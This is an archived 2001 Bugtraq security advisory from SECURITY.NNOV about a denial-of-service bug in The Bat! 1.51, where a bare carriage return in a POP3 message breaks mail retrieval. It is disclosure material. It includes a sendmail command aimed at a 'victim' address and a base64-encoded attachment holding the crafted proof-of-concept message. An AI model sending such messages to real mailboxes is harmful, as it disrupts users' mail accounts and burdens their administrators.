[20330] in bugtraq
SECURITY.NNOV: The Bat! bug
daemon@ATHENA.MIT.EDU (3APA3A)
Fri Apr 20 00:23:48 2001
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------11191C1F46A565"
Message-ID: <699942416.20010418170456@SECURITY.NNOV.RU>
Date: Wed, 18 Apr 2001 17:04:56 +0400
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
------------11191C1F46A565
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
There is more fun then security impact in this issue, but it's a kind
of DoS and can give a lot of headache to postmasters.
=-------8<----------------------------------
SECURITY.NNOV URL: http://www.security.nnov.ru
Topic: The Bat! <cr> bug
Application: The Bat! 1.51 (latest)
Vendor: RitLabs
Category: Denial of Service
Risk Factor: Low
Remote: Yes
Vendor Contacted: 13.04.2001
Software URL: http://www.thebat.net
Vendor URL: http://www.ritlabs.com
+Introduction:
The Bat! Is very convenient commercially available MUA for Windows
with lot of features.
+Details:
While RETRiving message via POP3 (IMAP isn't tested) The Bat!
incorrectly processes 0x0D (CR) character if it's not followed by
0x0A (LF). The Bat! incorrectly calculates end of the message and the
part of message is treated as reply from POP3 server. The Bat! fails
to receive the rest of the messages and fails to delete received
messages from server. This leads to DoS against user's POP3 account.
Malformed message can emulate any POP3 server replies.
+Exploitation:
Extract attached "badmessage" and send it, e.g. using
cat badmessage | sendmail -U victim@somewhere.net
or copy it to user's mailbox.
This message causes The Bat! to show something like:
!13.04.2001, 17:51:01: FETCH - Server reports error. The response is: --ERR Wrong User: replace user with your system administrator--
message is crafted to do not contain this text somewhere in the body.
+Workaround:
use "Dispatch Mail on Server" feature to delete malformed message
from server or use different MUA.
+Solution:
No yet.
+Vendor:
RitLabs was contacted on April, 13 (happy Easter to you, guys). No
feedback yet.
This advisory is being provided to you under RFPolicy v.2 documented
at http://www.wiretrip.net/rfp/policy.html.
--
http://www.security.nnov.ru
/\_/\
{ . . } |\
+--oQQo->{ ^ }<-----+ \
| 3APA3A U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
------------11191C1F46A565
Content-Type: application/x-zip-compressed; name="badmess.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="badmess.zip"
UEsDBBQAAAAIACCPjSoKbVmJuAEAAAMEAAAHACQAYmFkbWVzcwoAIAAAAAAAAQAYAAAeNJwhxMAB
wOLkTyLEwAHAstHPG8TAAa1S32/TMBB+5iT+h2NPTCOpna0QvFGtbB0qUgC1KTy7idcaGjvyj7H8
99hRtAmx9mVYebBz39333d13Y3SDSq913V1aUXkjXZcqpe9S47Hcepy2BmmGdMwIZdk7zAihcM2d
YDH8JsYiJP5+BJ2QM0LwdbG8PobIwPZRQCGs5RuRzGuGF7EIOaMZpYSm36ZTQrNx/k/OBK60ckK5
pDRc2VthkpmqdC3VhmG+lg5KvZ9w6dc/ReWCemEdNoEeinkxS74LY6VWDGlKHgm6NvTZ+J2TLTdu
1Mh7UZ/Di7X2quam+3A0Wyzwh9FqgysrDEMj2h2vBPrwwt/SbbHT3qDtrBMN8rqRSlpnuNPmCJaO
O28ZrgDKrbQYPo69GqEq3lq/C3Oue5FhRpAkz2D7uycn7t0o5Ep1YJi/tMwTA4AIZcA/6PifQoaa
I3Nb5Vl2fkBNv1mY9IZtAyS1lUyGrb6yXNVdvLi41SeM+/awcU8ZIeyU4gnJonE/FWV/O97rT5J+
mU4zkufj/P1lJJ3AzeJrMdjqYo/7JrBcffw8uyoH3Esc7AgA89C4UXw3RJ46+IBxAyaFZ24jSeAP
UEsBAhkAFAAAAAgAII+NKgptWYm4AQAAAwQAAAcAAAAAAAAAAAAgAAAAAAAAAGJhZG1lc3NQSwUG
AAAAAAEAAQA1AAAAAQIAAAAA
------------11191C1F46A565--
